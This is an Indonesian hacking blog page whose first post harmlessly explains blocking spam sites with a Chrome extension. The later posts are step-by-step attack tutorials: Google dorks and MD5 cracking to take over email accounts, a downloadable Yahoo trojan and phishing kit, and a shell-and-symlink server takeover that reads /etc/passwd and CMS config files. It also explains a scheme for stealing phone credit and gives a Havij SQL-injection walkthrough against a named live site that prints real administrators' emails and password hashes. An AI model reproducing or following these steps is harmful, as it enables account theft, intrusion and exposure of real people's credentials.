Diberdayakan oleh Blogger.
Latest Post

Cara Menghapus BLOG Orang Lain

Written By no on Sabtu, 07 September 2013 | 09.00








Saya akui, salah satu keburukan atau kekurangan hasil pencarian google yaitu masih mengandung banyak sekali situs sampah. Situs sampah yang saya maksudkan yaitu situs ‘Auto Generated Content’ (AGC). Situs ini biasanya mencuri feed dari banyak blog. Saya akan beri contoh konkret pada kata kunci “presenter pria terbaik indonesia”. Lihat hasilnya pada screenshot berikut.


contoh AGC

Lihatlah, betapa banyak situs sampah pada SERP google di atas. Posisi nomor 1 adalah link menuju postingan blog saya yang di blogspot (kafe28.blogspot.com) sebagai sumber asli, sedangkan nomor 2 adalah penggalan halaman home blog saya tersebut. Sisanya (nomor 3 dan selanjutnya) adalah deretan situs AGC yang sepertinya mengambil feed postingan blog saya.
Itu baru pada halaman pertama SERP. Pada halaman-halaman selanjutnya, deretan situs AGC juga tak kalah banyak. Mau contoh lain lagi? Coba amati screenshot kedua ini (dengan kata kunci ‘penyanyi bersuara khas‘).

 contoh lain AGC


Apa sebenarnya ciri-ciri situs AGC pada SERP google?

Saya punya versi tersendiri mengenai ciri situs AGC. Anda boleh tidak setuju dan mengoreksi jika ternyata keliru. Di antara ciri-ciri situs ‘auto generated content’ yaitu:

ciri pertama AGC
ciri pertama

 ciri kedua AGC
ciri kedua

ciri keempat AGC
ciri ketiga


ciri keempat AGC
ciri keempat

ciri kelima AGC
ciri kelima

ciri kelima AGC
ciri keenam

Jadi pada intinya, ada kata ‘search’ pada penggalan judul maupun deskripsi yang terindeks. Selain itu, ada tanda plus (+) pada bagian judul atau URL. Selain itu, apa lagi ya cirinya? Silakan Anda tambahkan nanti di kolom komentar.

Lalu, bagaimana menghajar situs-situs AGC tersebut agar tidak lagi tampil di hasil pencarian google?

Untuk sementara ini, Anda harus menggunakan salah satu ekstensi dari peramban/browser Google Chrome. Nama ekstensinya yaitu Personal Blocklist. Setelah Anda menginstall ekstensi tersebut, maka pada bagian sebelah kanan ‘address-bar’ peramban Chrome Anda akan muncul icon bulat berwarna merah seperti berikut ini.






Nah, untuk menggunakannya, coba Anda ketikkan sebuah kata kunci yang unik pada kolom pencarian google. Ambil contoh saja dari kata kunci berupa judul posting yang pernah Anda publish di blog. Usahakan agar kata kunci tersebut tidak terlalu umum. Jadi, lebih spesifik lebih baik. Lebih panjang juga lebih baik (jangan sampai cuma satu, dua, atau tiga kata).
Mengapa kata kuncinya harus unik dan spesifik? Hal ini untuk mempermudah Anda mengindentifikasi situs-situs AGC yang nantinya muncul pada SERP google. Secara logika, kata kunci yang unik (judul posting yang unik) akan sangat sedikit pesaingnya pada SERP google. Bahkan bisa saja tidak ada pesaingnya (yang punya judul sama).
Jadi, kalau kemudian ternyata muncul banyak judul posting yang sama dan terindeks pada hasil pencarian google, besar kemungkinan itu adalah situs-situs AGC.
Bukti nyatanya bisa Anda lihat pada 2 screenshot pertama di atas (yang saya tandai dengan tanda panah merah dan keterangan ‘AGC’ di sampingnya).

Bagaimana cara memblok situs AGC tersebut?

Nah, setelah Anda menginstall ekstensi ‘Personal Blocklist‘, maka pada hasil pencarian (SERP) google akan muncul keterangan untuk memblock domain yang terindeks. Lihat contohnya berikut ini.



Anda cukup mengklik menu untuk memblock domain tersebut. Setelah Anda mengkliknya, maka sesaat kemudian domain situs tersebut akan menghilang dari hasil pencarian google. Silakan Anda block domain situs-situs AGC lainnya yang terindeks pada SERP google (sesuai kriteria/versi yang saya paparkan pada bagian sebelumnya).
Agar tidak salah block, ada baiknya Anda tes dengan kata kunci pada salah satu postingan Anda yang tergolong orisinil dan unik, lalu amatilah hasil pencarian google yang mengandung judul posting yang sama dengan yang Anda buat (termasuk bagian deskripsinya).
Silakan Anda block domain selain blog Anda sebagai sumber asli konten yang terindeks pada kata kunci unik tersebut. Sebagai contoh, saya telah memblokir ratusan domain situs AGC berdasarkan kata kunci ‘Presenter Pria Terbaik Indonesia’. Hasilnya, pada halaman pertama SERP google menjadi lebih bersih. Lihat saja buktinya di bawah ini.

hasil pencarian bersih tanpa situs AGC
Dua blog yang terindeks di atas adalah blog saya (sebagai sumber konten asli yang pertama kali mempublish postingan berjudul ’5 Presenter Pria Terbaik Indonesia, Layakkah Mereka?’). Bukan cuma halaman pertama yang sudah bersih, tapi juga halaman-halaman selanjutnya.

Anda merasa salah blokir domain?

Jangan khawatir, Anda masih bisa melakukan ‘unblock’. Caranya cukup dengan mengklik icon ekstensi ‘Personal Blocklist’, lalu mengklik pilihan ‘Unblock’.
 Anda bahkan juga bisa mengekspor/mengimpor list domain yang diblokir. Cukup klik menu Import/Export seperti yang terlihat pada gambar di atas. Hasil klik menu Import/Export akan memunculkan kotak sepeti berikut.
  menu impor

 
Anda tinggal mem-’paste’ ke kolom isian ‘import’ (untuk melakukan impor data) atau mengopi list domain pada kolom ‘export’ (untuk mengekspornya ke tempat lain, misalnya ke browser Chrome pada PC lainnya). Jadi, Anda tidak perlu melakukan blokir secara manual lagi pada komputer lain. Cukup impor data situs yang sudah diblok pada menu ekstensi ‘Personal Blocklist’.

Mohon perhatian dan dukungan

Jika di komputer/PC Anda sudah terinstall Google Chrome, mohon agar Anda memanfaatkannya untuk mendukung gerakan pembersihan SERP google dari situs-situs ‘Auto Generated Content’. Tak peduli walaupun Anda jarang menggunakan Chrome untuk browsing. Yang penting Anda sudah mau peduli dengan pemberantasan situs-situs AGC (yang banyak merugikan para pencari dan juga penulis konten asli).
Jadi, saya menghimbau rekan-rekan pembaca sekalian. Oleh karena gerakan pembersihan situs sampah ini baru bisa dilakukan via peramban Google Chrome, mohon luangkan sedikit waktu Anda untuk menginstall ekstensi ‘Personal Blocklist‘, lalu mulailah coba memblock domain-domain yang menurut Anda teridentifikasi sebagai situs AGC.
Pihak google sepertinya akan mengumpulkan data dari para pengguna ekstensi ‘Personal Blocklist’, untuk kemudian mereka pertimbangkan sebagai dasar perbaikan algoritma pencarian mereka. Artinya, mereka akan mulai menyingkirkan situs-situs AGC dari hasil pencarian mesin pencari buatan mereka (google search engine). Salah satunya dari rekomendasi kita sebagai pengguna Chrome (lewat pemblokiran domain tertentu via ekstensi ‘Personal Blocklist’).
Jadi, mari kita bersama-sama memerangi dan menghajar situs ‘Auto Generated Content’. Secara tidak langsung, kita juga berperan dalam membantu pengguna Internet yang masih awam soal ciri-ciri situs AGC, sehingga mereka tidak perlu menghabiskan banyak waktu browsing mereka dengan mengklik situs-situs sampah.
Selain itu, kita juga ikut membantu para penulis konten asli.
Anda mau ikut dalam gerakan mulia ini?

cara hacker email yahoo





Cara Pertama

berikut hal-hal yang kita lakukan dalam hack akun email :

Gunakan google dork berikut :

Dork: ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e
Dork: ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password
Dork: ext:sql intext:@hotmail.com intext:password

Siapkan senjatanya :)
Ini diaah, langsung ajah ke => http://md5crack.com

Saatnya beraksi, tredeeeeeet… :)
1. Pergi ke google search engine
2. Masukkan dorknya
=> Naah.. temuin tuh banyak web yang mengandung email sama => MD5.nya
3. Naah.. buka halamannya
4. Cari email sama MD5.nya
5. Crack MD5 itu di senjata tadi
contoh  MD5 => d2491b289b6be1fd0bb0c8d60 e053d3d

Nah. Setelah MD5 itu dicrack, maka akan menghasilkan password
Silahkan masuk ke yahoo dengan password itu..
Hehehe..
Mudah.kan-?

Silahkan berselancar semoga dapet email dan password yang valid, jangan lupa komen disini share hasilnya juga boleh. Hehe…
Sampai ketemu di post selanjutnya…


Cara Kedua
Menggunakan Software

================ Yahoo Hacking Tools ============
Yahoo Hacking Tools adalah Tools Portable dalam Kegiatan Hacking Yahoo messenger.
dalam Yahoo Hacking Tools ini terdapat Software :
1. Emo Creator
Tools untuk membuat Icon2
2. Fake Pager
Adalah aplikasi Yahoo Messenger Palsu, yang berguna untuk mencuri user name
dan password.
3. Magic Password
Trojan yang digunakan untuk mencuri password
4. Yahoo Booter.
Aplikasi untuk memboot lawan chating
5. Yahoo Fake Cam
Tools untuk mengecoh lawan chating dengan Cam Palsu
6. Yahoo Fake Login
Halaman Login Palsu Yahoo (2008), yah buat nyuri password orang yang akan dikirim ke email
7. Yahoo Pass Stealler
Trojan Builder untuk nyulik password
8. Yahoo Hack
Yahoo messengger Palsu
9. Yahoo Pass Crack
Crack Password Yahoo seseorang
10. Yahoo Password Recovery
Untuk mengetahui Password dan user name ym seseorang
Download Disini

Password Archive: h4ck3v1l

Cara Hacker Hack Sebuah Web

 
Bahan & Alat :
1) Target Website
2) Shell
3) script symlink
4) MySQL manager
Langkah 1
Sekarang, kita periksa situsnya apa ada yg vuln utk dihajar :v
Ada satu hal yang tersisa, kita dapat hack situs tsb pada server yang sama ( 1 server ) #aneh yoo? maksute opo ? tapi tungguen baca dulu sampe rampungg...

Jadi kita udah punya target toh, langkah selanjutnya, kita harus cari tau IP servernya target

Yuk pergi ke CMD ( Start->RUN->CMD )
Code:
ping www.target.com





Sekarang kita dah memiliki(mengetahui) IP Server nya, skrg waktunya untuk cari celah ( vuln ) nya.

Pergi ke SINI dan masukan kode dibawah ini :
Code:
IP:IPYANGUDAHKITADAPETDARIPINGTADI ".php?*="



Selanjutnya,dari hasil scan IP tadi cari sebuah situs yang rentan terhadap SQLi. (Bisa di inject menggunakan tools seperti havij dll)

Kalo sukses, segera tanem shell

Langkah II
Hal pertama yang perlu dilakukan adalah menemukan path lengkap dari situs tsb.
yakni seperti begino:
Code:
/home/username/public_html/

Sekarang pergi ke shell dan jalankan perintah ini:
Code:
cat /etc/passwd


Sekarang copy semua teks yg tertera di situh dan tempel ke notepad.
Itu file berisi semua pengguna yg menggunakan server yg jadi target muw


Langkah III
Target ku adalah Joomla dan aq tau di mana file yg berisi informasi MySQL. (config.php)
Code:
/home/targetsaya/public_html/configuration.php ( Ini config nya joomla )

kalau wordpress mas ?
Kalo targetmu wordpress , config nya ada disini
Code:
/home/targetmu/public_html/wp-config.php

Nah, skrg upload symlink mu dan mySQL Manager nya ,
Buka symlink nya dan masukin path config web targetmu
dalam kasus ku iku :
Code:
/home/softcube/public_html/configuration.php
Sekarang klik "Symlink" dan skrg kita dapet mysql info nya


Salin semua ke Notepad + +
( Notepad++ lebih baik karena kita dapat dgn mudah menemukan password dan username)
Cari username dan password web targetmu yg da tercantum di mysql info nya,,dan buka mysql.php ,
Masukkan dan sekarang kita dpat mengedit database.



Sekarang klik "Tabel" dan klik table "admin".
disini kita bisa membuat user, staff, dan membuat pssword
(Ingatlah untuk mencatat hash asli sehingga cara hackmu tetep gak terdeteksi jika ingin akses lgi

Sekarang, aq sudah mengganti hash(password admin) dan login

Mencuri Password dengan Keylogger

Written By no on Minggu, 01 September 2013 | 10.45


                                             Mencuri Password dengan Keylogger

Setiap account di internet pasti memerlukan username dan password. Username dan Password adalah suatu hal yang paling rahasia dalam suatu transaksi di internet. Bahkan saking rahasianya, orang paling terdekat pun jangan sampai mengetahui usename dan password kita. Namun mengapa ada saja seseorang yang kebobolan account nya padahal tidak seorangpun ia beritahu tentang username dan passwordnya?

Banyak sekali kejadian bahwa username dan password dari suatu account seseorang dibajak orang. Artinya kita tidak dapat lagi mengakses account kita. Pernah suatu ketika, teman saya datang kepada saya, dan melaporkan bahwa account e-currency (pembayaran electronic), hilang sebesar US $ 500, atau sekitar 5 juta rupiah. Hmm..mungkin ia adalah korban pencurian password.

Mencuri username dan password seseorang bisa dilakukan dengan berbagai cara. Salah satunya adalah dengan menggunakan software Keylogger. Apa itu keylogger?

Keyloger adalah software pencatat aktivitas yang kita lakukan di komputer. Apapun yang kita ketikkan di komputer, maka akan tercatat oleh keyloger tersebut. Dari kita menekan a-z, 0-9, kombinasi keyboard seperti ctrl+A dan lain-lain akan tercatat oleh keylogger. Keylogger akan mencatatnya dalam bentuk file teks, *.txt.

Cara kerja keyloger bersifat hidden (tersembunyi). Biasanya dia akan muncul di systray jika kita melakukan kombinasi keyboard (shortcut tertentu). Begitu kita menekan kombinasi keyboard, maka icon keylogger akan muncul di systray.

Bagaimana caranya seseorang bisa mencuri username dan password kita dengan menggunakan keylogger? Baca dan ketahui cara seseorang mencuri username dan password kita dengan menggunakan keylogger dalam ebook gratis yang berjudul Mencuri Password dengan Keylogger

Ebook yang berjudul Mencuri Password dengan Keylogger ini tidak digunakan untuk mencuri password dan username orang lain, atau bahkan untuk berbuat kejahatan..tetapi materi ini digunakan untuk membantu kita terhindar dari kejahatan. Agar kita waspada dan berhati – hati dengan pencurian password dengan menggunakan keylogger.

Cara Mencuri Pulsa Orang Lain

Cara Mencuri Pulsa Orang Lain Dengan Mudah - Kali ini saya akan berikan Cara Mencuri Pulsa Orang Lain Dengan Mudah khusus bagi anda pengunjung setia blog ini, karena kali ini saya akan berikan informasi yang akan menguntungkan anda jika proses ini brhasil karna saya akan berikan Cara Mencuri Pulsa Orang Lain Dengan Mudah. Jika sobat penasaran dengan Cara Mencuri Pulsa Orang Lain Dengan Mudah ini, sobat bisa ikuti langkah nya dibawah ini


Cara Mencuri Pulsa Orang Lain Dengan Mudah

1. kamu masuk aplikasi mig33 ( http://wap.mig33.com/join.php ) Tanpa Tanda Kurung , ( Gunakan Browse Mobile Anda ) Jangan Lewat PC Atau Warnet ( Notebook ) Anda,. Tanpa Tanda Kurung ,
2. Setelah Itu , Langsung Aja regristrasi ( Daftar ), kamu isi username, password, dan no hp (no. Korban yg akan kamu sedot pulsanya),
3. lalu submit, setelah itu kamu login dan pilih remind me later,
4. lalu kamu plih invite friend no tujuan kamu isi “TP(spasi)no.kamu(spasi)jumlah pulsa”( Tanpa Tanda Kutip ) , Yang Ingin Kamu Curi Dari Si Korban ,

( Yang Mesti di Ingat , Misalkan Kamu Ingin Mencuri Pulsa Si Korban Sebanyak 50.000 , Akan Tetapi Pulsa Si Korban Hanya 20.000 , Maka Akan Terjadi Erorr ,Itu di Karenakan Pulsa Si Korban Tidak Mencukupi Untuk Kamu Curi )

Contoh 1 :

Sebut Aja Kamu Dengan Nama Si ” A ” ( Si Pelaku Pencurian )

Dan Sebut Aja Si Korban Yang Ingin Kamu Curi Pulsa’a , Si ” B “

SI “A” —- > TP 08565555555 50000

Keterangan : Brati Si A Mencuri Pulsa Dari No Hp 08565555555 Sebanyak Rp.50.000

Si “B” —– > Sementara Si ” B ” Pulsa’a Hanya Rp. 20.000

Apabila Kaya Seperti di Atas , Kemungkinan Akan Terjadi Erorr ,Karena Pulsa Si ” B ” Hanya Rp.20.000 Sedangkan Si ” A ” Mencuri Rp.50.000 Dari Si “B” Yang Terjadi Adalah Pulsa Si B Tidak Mencukupi Target Yang di Minta Oleh Si “A” , Maka Terjadilah Erorr …. Tapiiii … Apabila DewiFortuna di Pihak Anda Maka Cara Seperti ini pun Berhasil …. Maka Pulsa SI “B” Yang Rp.20.000 Tidak Tersisa Sepeserpun Untuk Si “B”.

Jika sobat ingin tidak terjadi eror berikut ini akan saya berikan Tips nya..

1. Sobat Mesti Tau Betul Orang Yang Ingin di Curi Pulsa’a ( Untuk Percobaan ) sobat Curi Pulsa Ade sobat Atau Sodara Sendri
2. Sobat Mesti Tau Pulsa Dari Ade Atau Kaka Sobat Yang Ingin di Curi
3. Ini di Karena Agar Sobat Tau Betul Dan Yang diperlukan Dalam Teknik Ini adalah Mengira-Ngira Isi Pulsa Si “B”. Jangan Sampai Melebihi Dari Target Yang Sobat Minta Ke Si “B”

Misalkan : Misal Si B Mempunyai Pulsa Rp. 30.000 , Maka Yang Harus sobat Lakuin Adalah , Jangan Melebihi Pada Saat Mencuri Pulsa Si B , Cara Seperti ini Kemungkinan 99,9% Sukses , di Bandingkan Cara Sebelumnya ,

Contoh Yang Benar :

TP 085555555 29500 ( Maka Yang Akan Terjadi Adalah Pulsa Si “B” Hanya Kamu Sisain Rp.500 Perakkkk ….. )

Keterangan :

TP —– > Perintah Tranfer Pulsa Untuk Operator M3 , Untuk kartu lain sesuaikan kode transfernya.

085555555 —– > Nomer Hp Si Korban Yang Ingin Kamu Curi

29500 ——– > Jumlah Pulsa Yang Ingin Kamu Curi

Nah, demikian Cara Mencuri Pulsa Orang Lain Dengan Mudah yang telah sobat lihat tadi, tapi ingat cara Cara Mencuri Pulsa Orang Lain Dengan Mudah ini jangan disalhgunakan untuk hal-hal tidak benar..

Tutorial SQL Injection Menggunakan Havij 1.10

Written By no on Minggu, 03 Februari 2013 | 21.58

Havij Vers 1.10 , sebuah tool yang powerfull untuk mendapatkan akses admin dengan teknik sql injection. untuk informasi dan download tool ini bisa anda temukan di thread dibawah ini.
https://www.box.net/shared/ky9xenske7
Ok saya asumsikan anda sudah download dan install di mesin anda. sekarang mari kita coba salah satu website.
web target : http://www.xenia.co.il/index.php?page_id=93
seperti biasanya berikan tanda ‘ pada web tsb: http://www.xenia.co.il/index.php?page_id=’93
hasilnya dapat anda lihat pada gambar dibawah. BUG SQL Injection
Image
Sekarang jalankan tool Havij lalu masukkan link tersebut lalu klik Analize dan tunggu beberapa saat (yang ini ga sampe 1 menit).

Image
hasilnya:
Havij 1.10 ready!
Analyzing http://www.xenia.co.il/index.php?page_id=’93
Host IP: 212.150.130.231
Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Powered-by: PHP/5.2.12
Keyword Found: mysql_num_rows():
I guess injection type is Integer?!
DB Server: MySQL
Selected Column Count is 2
Valid String Column is 1
Target Vulnerable :D
Current DB: xeniaco_xenia
w007s…… I Got the database… sekarang klik Tables lalu klik Get Tables.
Image
w007s….. I gOt the Tables from xeniaco_xenia database..
users_match
users_fav
params_parents
params_pages
params_icons
params
page_managers
page_banned
page_allowed
nuke_users
newsletter1
main_access
lpn_users_areas_maps
lpn_users_areas
ip_blocker
gallery_auth_users
form_datas
enter_rules
cat_tbl
bep_users_target
bep_users_cats
bep_pics
bep_other
bep_news
bep_links
bep_html_data
bep_files
bep_data
bep_banners
bep_addons
banners
admins
admin_titles
WhoIsOnLineTbl
WhoIsOnLineMessagesTbl
Table1
Nah .. pada tahap ini, anda perlu cari tahu… dimana letak table yang berisi informasi admin login. setelah ditelusuri ternyata terdapat pada tabel nuke_users. sekarang coba kita lihat isi kolom daripada tabel nuke_users.
Beri tanda centang pada nuke_users lalu klik Get Columns dan tunggu beberapa saat (hmmm… 10 detik aja).
Image
w007ss…. cool.. got to check it out… saya dapatkan kolom sbb
regdate
status
regkey
user_msg_to_mail
mail_check_interval
mail_pass
mail_login
mail_port
mail_server
user_level
user_rank
user_attachsig
user_posts
user_char
newsletter
counter
commentmax
theme
ublock
ublockon
bio
noscore
thold
uorder
umode
storynum
apass
pass
user_cell
user_homephone
user_theme
user_viewemail
user_sig
user_homepage
user_from
user_sign
user_dob
user_regdate
user_avatar
l_name
femail
email
uname
name uid
newsletter1
nah.. ini adalah kolom dari tabel nuke_users yang berisi informasi registrasi, nama, password, email, nomor hp dari Admin website http://www.xenia.co.il.. sekarang saya akan mencoba mendapatkan akses selanjutnya ke website ini.. hmmmm…. saya ceklis aja kolom :
name
email
pass
(kolom lain ga penting.. cuma pengen dapat username dan passwordnya aja).
lalu klik Get Data dan
Image
Hasilnya sebagai berikut :
Count(*) of xeniaco_xenia.nuke_users is 3
Data Found: name=àåãé
Data Found: email=udi@tmuna.co.il
Data Found: pass=b440097c79ba6183170f5f118b47a31d
Data Found: name=guy
Data Found: email=guy@xenia.co.il
Data Found: pass=f4384abb3921b5cf321a5a24960c4aef
Data Found: name=inbar
Data Found: email=inbar@xenia.co.il
Data Found: pass=b3f61131b6eceeb2b14835fa648a48ff
w007s…. ternyata website ini memiliki 3 administrator…
hmmmm… passwordnya di HASH alias di-enkripsi….. no problem… havij juga punya md5 hash crack..
Klik MD5 masukkan data salah satu data HASH lalu klik start (tunggu beberapa saat…. 30 detik deh). lalu hasilnya

w0000000000000000000000000000007ZZZZZZZZZZZZZZZZ… password berhasil di-crack.. sekarang tinggal cari halaman login.
Klik Find Admin lalu isi Path to search dengan http://www.xenia.co.il/ lalu klik start…. …. …………. Searching
Image
Got that….
Page Found: http://www.xenia.co.il/login.php
Sekarang anda hanya tinggal ke halaman login, masukkan nama user password dan….
U gained an Access
Image
(sumber)
Download: Havij1.10.rar

Cara Hack Dengan Havij


Langkah pertama, cari dulu website yang akan dijadikan target. Buka google, ketik misalkan : inurl:index.php?id=

Setelah kita dapat web target, cek menggunakan tanda petik – '
Buka Tools havij copas url web

Spoiler Hide:


1. Setelah di copas URL’y lalu Klik icon Analyze. Tunggu sampai selesai. (Biarkan sampai status kembali I’m IDLE)
Kalo dagh selesai nanti tampilan’y akan seperti ini :

Spoiler Hide:


2. Selanjut’y Klik icon Tables, tampilan’y seperti ini :

Spoiler Hide:


3. lanjutkan dengan mengKlik Get DBs Screenshoot seperti di bawah ini :

Spoiler Hide:


OK guys...udah keliatan tuwh nama2 dari database’y, tgl dipilih target yg ingin qta perkosa. Qta perkosa Database yg bernama Administrator aja. Very Happy

4. Klik DB Administrator lalu klik Get Tables, nanti akan keluar tables2’y seperti ini :


Spoiler Hide:


5. Next sekarang qta cari columns’y. Cara’y klik hasil yg keluar tadi beberapa columns yg keluar dari tables Administrator seperti ini : isdeleted,tingkat,password,user_name,id
Qta centang user_name and password’y saja lalu klik Get Data.
Ok guys selesai akhir’y password and user_name Admin dah nongol tuwh.

Spoiler Hide:


Tools ini memang cukup banyak fungsi’y, selain sql injection secara otomatic. Tools ini mempunyai banyak fitur lain’y antara lain untuk mencari halaman admin ato mencari password hash MD5.

Spoiler Hide:


Cukup sampe sini aja yak, klo untuk mencari halaman admin’y ato MD5 silahkan di otak-atik sendiri aja. Cara’y mudah kok.

Download Tools Havij : Razz
 
Support : Jasa Hacker | Sofware Hacker | Video Hacker
Copyright © 2011. situs hacker indonesia - All Rights Reserved
Template Created by Software Hacker Facebook Published by Kumpulan Hacker
Proudly powered by Blogger
Back to TOP